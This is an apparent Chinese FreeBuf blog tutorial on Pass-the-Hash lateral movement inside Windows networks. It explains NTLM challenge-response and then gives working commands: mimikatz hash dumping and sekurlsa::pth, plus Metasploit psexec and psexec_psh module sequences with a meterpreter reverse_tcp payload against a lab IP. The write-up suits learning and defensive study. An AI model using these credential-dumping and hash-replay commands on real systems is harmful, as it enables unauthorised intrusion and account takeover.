freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

内网渗透拿不到密码怎么办?试试Pass-The-Hash
Tovd 2021-04-26 12:50:12 126124

严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。

前言

在进行内网渗透的过程中,会存在已经获取用户的NTLM 哈希值但是无法解开,获取不到密码的情况,这时就能够通过Pass-The-Hash来进行横向渗透。

Pass-The-Hash 原理

NTLM认证:

1. 用户输入user,pass,domain客户端会计算hash值保存至本地

2. 客户端将user明文发给DC

3. DC生成一个16Byte的随机数(challenge)发送给客户端

4. 客户端通过运算生成一个响应值respone=f(hash,challenge,other) (用hash加密challenge生成respone)other(时间戳等) respone(也可以说是加密后的challenge)

5. 客户端将respone发送给DC

6. DC通过同样的运算result=f(hashdc,challenge,other)(DC用本地的hashdc来加密challenge生成result)然后比较result和respone的值是否相等,相等则认证成功

通过wireshark抓包分析NTLM认证过程

negotiate_message: negotiate_message定义从客户端发送到服务器的NTLM协商消息,该消息允许客户端向服务器指定其支持的NTLM选项

challenge_message:从服务器发送到客户端的NTLM质询消息,服务器使用challege_message来挑战客户端以证明其身份,对于面向连接的请求,服务器生成的challenge_message响应客户端的negotiate_message

authenticate_message: authenticate_message定义在客户端处理challenge_message之后从客户端发送到服务器的NTLM身份验证消息

Type 1协商

这个过程是客户端向服务器发送type 1(协商)消息,它主要包含客户端支持和服务器请求的功能列表。

image

Type 2质询

这个过程是服务器用type 2消息(质询)进行响应,这包含服务器支持和同意的功能列表,以及生成的challege

image

Type 3 身份验证

这个过程客户端接收到challenge之后,使用用户hash与challenge进行加密运算得到response,将response,username,challenge等信息发给服务器。

image

从上面的认证过程可以看出,DC最终通过比较respone和result是否相等来判定认证是否成功,而我们通过mimikazt来获取到hash值,我们只要把获取到的hash值发给DC就可以通过认证。

Pass-The-Hash利用的几个前提条件

工作组环境下

Windows Vista之前的机器,可以使用本地管理员组内用户进行攻击 windows Vista之后的机器,只能是administrator用户才能进行攻击,其他用户会提示拒绝访问

域环境下

域内任意一台主机的本地管理员权限和域管理员密码的NTLM hash值,可进行pth攻击

由于Pass-The-Hash在win7的工作组环境下只支持在administrator用户的情况下才能利用,而windows默认是关闭这个用户的,现在我们来开启它。

net user administrator /active:yes

首先利用mimikatz(mimikatz需要管理员权限)读取到用户密码的hash值

命令:sekurlsa::logonPasswords

LM: ccf9155e3e7db453aad3b435b51404ee

NTLM:3dbde697d71690a769204beb12283678

image

利用mimikatz进行pth攻击

sekurlsa::pth /user:administrator /domain:172.16.1.199 /ntlm:3dbde697d71690a769204beb12283678

image

image

利用msf进行pth攻击

exploit/windows/smb/psexec
use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set rhosts 172.16.1.199
set smbuser administrator
set smbpass ccf9155e3e7db453aad3b435b51404ee:3dbde697d71690a769204beb12283678
run

image

expliot/windows/smb/psexec_psh
use exploit/windows/smb/psexec_psh
set payload windows/meterpreter/reverse_tcp
set rhosts 172.16.1.199
set smbuser administrator
set smbpass ccf9155e3e7db453aad3b435b51404ee:3dbde697d71690a769204beb12283678
run

image

# web安全 # 网络安全技术
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 Tovd 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
Tovd LV.4
这家伙太懒了,还未填写个人描述!
  • 9 文章数
  • 6 关注者
蚁剑绕过disable_function插件分析
2021-04-13
记一次Me-and-My-Girlfriend靶机渗透
2021-04-02
SQL利用杂谈
2021-03-21
文章目录